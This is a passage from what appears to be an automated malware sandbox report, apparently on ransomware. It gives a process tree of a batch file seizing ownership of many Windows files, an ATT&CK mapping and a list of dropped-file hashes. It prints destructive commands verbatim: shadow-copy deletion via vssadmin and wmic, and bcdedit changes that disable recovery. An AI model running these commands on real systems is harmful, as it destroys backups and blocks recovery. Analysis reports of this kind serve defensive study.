  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:4168
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl""
  2⤵
  PID:3464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl"
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner
    3⤵
    PID:3904
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner
      4⤵
      PID:2232
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl""
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" /E /G Admin:F /C
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl"
    3⤵
    - Modifies file permissions
    PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner
    3⤵
    PID:824
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner
      4⤵
      PID:3524
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:5008
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:4120
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:2204
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl""
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl"
    3⤵
    - Modifies file permissions
    PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner
    3⤵
    PID:3536
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    PID:4296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:3780
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl""
  2⤵
  PID:620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" /E /G Admin:F /C
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl"
    3⤵
    - Modifies file permissions
    PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner
    3⤵
    PID:3644
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner
      4⤵
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:4464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    PID:412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:2584
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl""
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" /E /G Admin:F /C
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner
    3⤵
    PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner
      4⤵
      PID:1840
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:4980
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" /E /G Admin:F /C
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl"
    3⤵
    - Modifies file permissions
    PID:3952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner
    3⤵
    PID:3500
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner
      4⤵
      PID:4924
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:3784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:2084
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:8
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4828
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1132
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Modifies file permissions
    PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:1728
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:1744
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl""
  2⤵
  PID:4328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" /E /G Admin:F /C
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl"
    3⤵
    - Modifies file permissions
    PID:4016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner
    3⤵
    PID:3664
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner
      4⤵
      PID:3184
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:4796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:1668
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:2624
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl""
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" /E /G Admin:F /C
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl"
    3⤵
    - Modifies file permissions
    PID:4672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner
    3⤵
    PID:1220
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner
      4⤵
      PID:2664
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat"
1⤵
PID:5096
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4724
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4812
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4124
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3004
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4136

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
eb40467e71e492b92ee8504bfcabc4f5

SHA1
d7d6b179124e93010a34bebf8af2c46187dbc26d

SHA256
e4d1e562d3b5b8d290eec056979f2f6973ca3fd398c23992db33605a78e5ec3f

SHA512
d889dbf66576babc41a94c12cc9754ffe6180d67feeaca08ff02ed19a8b9b1ca691e1e85226ebaaef45adb7f71fc2e36f9ee0f1cc80635176c8a2455ebda1c5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\154.61.71.13_log.txt

Filesize
74B

MD5
fd0c3fc7314166b6c7c62768b6169aae

SHA1
18a35dc67f43a690483d6365788b40d9f1ff0f43

SHA256
71d1ded027b19776100d01285365b2af5eac174ca7a35641c8b5900ae0495fef

SHA512
49241c10796bb10fa466aca038275e20d267931c14c24972ed3847059ccff4410d3800fb5875882201c1bf602bb43464aeac51cfe907b44b19c04951c8a112d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\JjDeQHEq.txt

Filesize
14B

MD5
8eb51985066cb0782077f624013d47a2

SHA1
0549d07d51454e73b937946ba1887cacfce71835

SHA256
5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

SHA512
539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe

Filesize
1.2MB

MD5
c50c17057fc6ea67bc579196f1f73712

SHA1
44495db58fa7c94db840a3f696c8f546a5fce2d1

SHA256
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

SHA512
7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe

Filesize
1.2MB

MD5
c50c17057fc6ea67bc579196f1f73712

SHA1
44495db58fa7c94db840a3f696c8f546a5fce2d1

SHA256
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

SHA512
7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
